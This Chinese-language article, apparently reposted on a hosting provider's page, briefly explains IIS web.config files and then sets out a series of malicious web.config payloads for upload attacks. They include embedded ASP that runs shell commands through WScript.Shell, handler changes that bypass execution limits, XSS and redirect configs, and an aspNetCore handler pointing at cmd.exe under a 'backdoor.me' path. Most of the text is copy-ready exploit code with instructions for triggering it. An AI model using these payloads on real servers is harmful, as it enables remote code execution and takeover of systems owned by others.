Web.config文件的方法

美工学习

什么是web.config文件呢？
Web.config文件是一个XML文本文件，它用来储存ASP.NETWeb 应用程序的配置信息（如最常用的设置ASP.NETWeb 应用程序的身份验证方式），它可以出现在应用程序的每一个目录中。当你通过.NET新建一个Web应用程序后，默认情况下会在根目录自动创建一个默认的Web.config文件，包括默认的配置设置，所有的子目录都继承它的配置设置。如果你想修改子目录的配置设置，你可以在该子目录下新建一个Web.config文件，它可以提供除从父目录继承的配置信息以外的配置信息，也可以重写或修改父目录中定义的设置。web.config文件放置在要目录下则会对整个网站产生影响，如果放置在其它目录之下，则只会对当前目录产生影响。

1.代码执行

1. <?xml version="1.0" encoding="UTF-8"?>
   
2. <configuration>
   
3.    <system.webServer>
   
4.       <handlers accessPolicy="Read, Script, Write">
   
5.          <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
   
6.       </handlers>
   
7.       <security>
   
8.          <requestFiltering>
   
9.             <fileExtensions>
   
10.                <remove fileExtension=".config" />
    
11.             </fileExtensions>
    
12.             <hiddenSegments>
    
13.                <remove segment="web.config" />
    
14.             </hiddenSegments>
    
15.          </requestFiltering>
    
16.       </security>
    
17.    </system.webServer>
    
18.    <appSettings>
    
19. </appSettings>
    
20. </configuration>
    
21. <!–-
    
22. <% Response.write("-"&"->")
    
23. Response.write("<pre>")
    
24. Set wShell1 = CreateObject("WScript.Shell")
    
25. Set cmd1 = wShell1.Exec("whoami")
    
26. output1 = cmd1.StdOut.Readall()
    
27. set cmd1 = nothing: Set wShell1 = nothing
    
28. Response.write(output1)
    
29. Response.write("</pre><!-"&"-") %>
    
30. -–>
    

复制代码

在web.config中添加了一个可读可写权限的处理句柄程序，然后我们在<% %>之内写入了服务器端命令执行代码。当把这个web.config文件上传成功之后，浏览访问它，就会执行系统命令whoami命令
2.绕过执行限制

1. <?xml version="1.0" encoding="utf-8"?>
   
2. <configuration>
   
3.     <system.webServer>
   
4.         <handlers accessPolicy="Read, Write, Execute, Script" />
   
5.     </system.webServer>
   
6. </configuration>
   

复制代码

3.XSS

iis6及以下版本不支持

1. <?xml version="1.0" encoding="UTF-8"?>
   
2. <configuration>
   
3.   <system.webServer>
   
4.       <handlers>
   
5.         <!-- XSS by using *.config -->
   
6.         <add name="web_config_xss&lt;script&gt;alert('xss1')&lt;/script&gt;" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="fooo" resourceType="Unspecified" requireAccess="None" preCondition="bitness64" />
   
7.         <!-- XSS by using *.test -->
   
8.         <add name="test_xss&lt;script&gt;alert('xss2')&lt;/script&gt;" path="*.test" verb="*"  />
   
9.       </handlers>
   
10.       <security>
    
11.         <requestFiltering>
    
12.             <fileExtensions>
    
13.               <remove fileExtension=".config" />
    
14.             </fileExtensions>
    
15.             <hiddenSegments>
    
16.               <remove segment="web.config" />
    
17.             </hiddenSegments>
    
18.         </requestFiltering>
    
19.       </security>
    
20.   <httpErrors existingResponse="Replace" errorMode="Detailed" />
    
21.   </system.webServer>
    
22. </configuration>
    

复制代码

访问 web.config 就会弹窗

4.重定向

版本 < iis7

1. <?xml version="1.0" encoding="UTF-8"?>
   
2. <configuration>
   
3.     <system.webServer>
   
4.         <httpRedirect enabled="true" destination="https://www.baidu.com/" />
   
5.     </system.webServer>
   
6. </configuration>
   

复制代码

版本 >= iis7

1. <?xml version="1.0" encoding="UTF-8"?>
   
2. <configuration>
   
3.     <system.webServer>
   
4.         <rewrite>
   
5.             <rules>
   
6.                 <rule name="AddTrailingSlashRule1" stopProcessing="true">
   
7.                     <match url="(.*[^/])$" />
   
8.                     <conditions>
   
9.                         <add input="{REQUEST_FILENAME}" matchType="IsDirectory" negate="true" />
   
10.                         <add input="{REQUEST_FILENAME}" matchType="IsFile" negate="true" />
    
11.                     </conditions>
    
12.                     <action type="Redirect" url="{R:1}/" />
    
13.                 </rule>
    
14.             </rules>
    
15.         </rewrite>
    
16.     </system.webServer>
    
17. </configuration>
    

复制代码

5.RCE

1. <?xml version="1.0" encoding="utf-8"?>
   
2. <configuration>
   
3.     <system.webServer>
   
4.       <handlers>
   
5.         <remove name="aspNetCore" />
   
6.         <add name="aspNetCore" path="backdoor.me" verb="*" modules="AspNetCoreModule" resourceType="Unspecified" />
   
7.       </handlers>
   
8.       <aspNetCore processPath="cmd.exe" arguments="/c calc"/>
   
9.     </system.webServer>
   
10. </configuration>
    

复制代码

通过去访问服务器上的backdoor.me进行触发

6.运行asp代码

1. <?xml version="1.0" encoding="UTF-8"?>
   
2. <configuration>
   
3.   <system.webServer>
   
4.       <handlers accessPolicy="Read, Script, Write">
   
5.         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />      
   
6.       </handlers>
   
7.       <security>
   
8.         <requestFiltering>
   
9.             <fileExtensions>
   
10.               <remove fileExtension=".config" />
    
11.             </fileExtensions>
    
12.             <hiddenSegments>
    
13.               <remove segment="web.config" />
    
14.             </hiddenSegments>
    
15.         </requestFiltering>
    
16.       </security>
    
17.   </system.webServer>
    
18. </configuration>
    
19. <%
    
20. Response.write("-"&"->")
    
21. 'it is running the ASP code if you can see 3 by opening the web.config file!'
    
22. Response.write(1+2)
    
23. Response.write("<!-"&"-")
    
24. %>
    

复制代码

道勤主机提供365天*24小时全年全天无休、实时在线、零等待的售后技术支持。竭力为您免费处理您在使用道勤主机过程中所遇到的一切问题! 如果您是道勤主机用户，那么您可以通过QQ【792472177】、售后QQ【59133755】、旺旺【诠释意念】、微信：q792472177免费电话、后台提交工单这些方式联系道勤主机客服！ 如果您不是我们的客户也没问题，点击页面最右边的企业QQ在线咨询图标联系我们并购买后，我们为您免费进行无缝搬家服务，让您享受网站零访问延迟的迁移到道勤主机的服务！